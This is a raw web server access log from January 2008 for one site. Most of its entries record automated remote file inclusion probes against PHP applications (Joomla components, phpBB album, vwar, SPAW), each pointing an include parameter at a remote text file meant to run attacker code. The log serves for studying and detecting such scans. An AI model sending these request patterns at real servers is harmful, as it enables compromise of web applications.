216.67.231.247 - - [03/Jan/2008:11:13:45 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:11:15:05 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:11:15:10 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:11:15:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:11:16:50 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:11:16:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.68 - - [03/Jan/2008:11:16:51 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.248.204 - - [03/Jan/2008:11:18:52 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:11:27:20 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:11:27:20 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:11:27:20 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [03/Jan/2008:11:28:24 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.80.76 - - [03/Jan/2008:11:30:33 -0800] "GET //skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/claroline/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.156 - - [03/Jan/2008:11:30:43 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:11:32:18 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:11:32:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.67.237.143 - - [03/Jan/2008:11:32:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.67.237.143 - - [03/Jan/2008:11:32:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:11:34:36 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:11:34:36 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:34:50 -0800] "GET /logs/access_071224.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:34:51 -0800] "GET /scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:34:52 -0800] "GET /logs/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:11:35:29 -0800] "GET /logs/access_071219.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [03/Jan/2008:11:43:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.67.237.143 - - [03/Jan/2008:11:43:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:11:43:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.86.131.226 - - [03/Jan/2008:11:43:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:11:45:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.120.241.242 - - [03/Jan/2008:11:45:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:47:02 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.74.178.60 - - [03/Jan/2008:11:47:02 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.de/search?q=iopus-i-m&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:de:official&client=firefox-a" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:47:10 -0800] "GET /modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:47:15 -0800] "GET /logs/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:11:47:59 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:11:47:59 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.79.202.178 - - [03/Jan/2008:11:47:59 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:55:25 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:55:31 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:11:55:39 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.80.76 - - [03/Jan/2008:11:56:51 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/claroline/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.80.76 - - [03/Jan/2008:11:56:52 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/claroline/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.80.76 - - [03/Jan/2008:11:58:09 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/claroline/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.215.83 - - [03/Jan/2008:12:02:11 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
205.234.215.83 - - [03/Jan/2008:12:02:11 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:12:02:44 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
88.191.20.52 - - [03/Jan/2008:12:02:44 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:12:02:48 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.90.125.203 - - [03/Jan/2008:12:04:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.90.125.203 - - [03/Jan/2008:12:04:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.70.35.179 - - [03/Jan/2008:12:04:55 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:11:06 -0800] "GET /logs//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:11:06 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:11:06 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:11:06 -0800] "GET //language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:12:28 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.242.64.153 - - [03/Jan/2008:12:12:28 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:10 -0800] "GET /logs/access_071219.log//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:11 -0800] "GET //language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:12 -0800] "GET /logs//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:14:13 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:14:14 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:14:14 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:19 -0800] "GET /logs/access_071219.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:19 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:20 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:14:56 -0800] "GET /logs/access_071221.log//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:15:12 -0800] "GET /logs/access_071221.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.224 - - [03/Jan/2008:12:18:32 -0800] "GET /logs/access_071209.log HTTP/1.0" 200 44097 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:19:30 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:22:46 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:12:23:54 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:28:23 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:28:24 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:12:32:46 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:12:42:30 -0800] "GET /%3Cstring%3Ehttp://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:12:42:30 -0800] "GET /logs/%3Cstring%3Ehttp://h1.ripway.com/batam/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:12:42:48 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:12:43:45 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.222 - - [03/Jan/2008:12:44:34 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:12:44:42 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:12:44:48 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:12:45:05 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:12:45:06 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:12:45:06 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:17 -0800] "GET /logs/access_071219.log//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:18 -0800] "GET //language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:18 -0800] "GET /logs//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:23 -0800] "GET /logs/access_071219.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:25 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:25 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:12:46:31 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:12:46:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.29.19 - - [03/Jan/2008:12:46:32 -0800] "GET /tmp/ HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.0.141.110 - - [03/Jan/2008:12:46:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.24.145 - - [03/Jan/2008:12:46:33 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:46:52 -0800] "GET /logs/access_071221.log//language/lang_japanese/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.231.247 - - [03/Jan/2008:12:47:01 -0800] "GET /logs/access_071221.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.175.17.27 - - [03/Jan/2008:12:47:04 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:12:47:59 -0800] "GET /logs//language/lang_chinase/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.68.5 - - [03/Jan/2008:12:48:05 -0800] "GET //language/lang_chinase/lang_main_album.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:12:58:21 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:12:58:27 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.241.242.25 - - [03/Jan/2008:12:58:36 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:12:59:28 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [03/Jan/2008:12:59:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
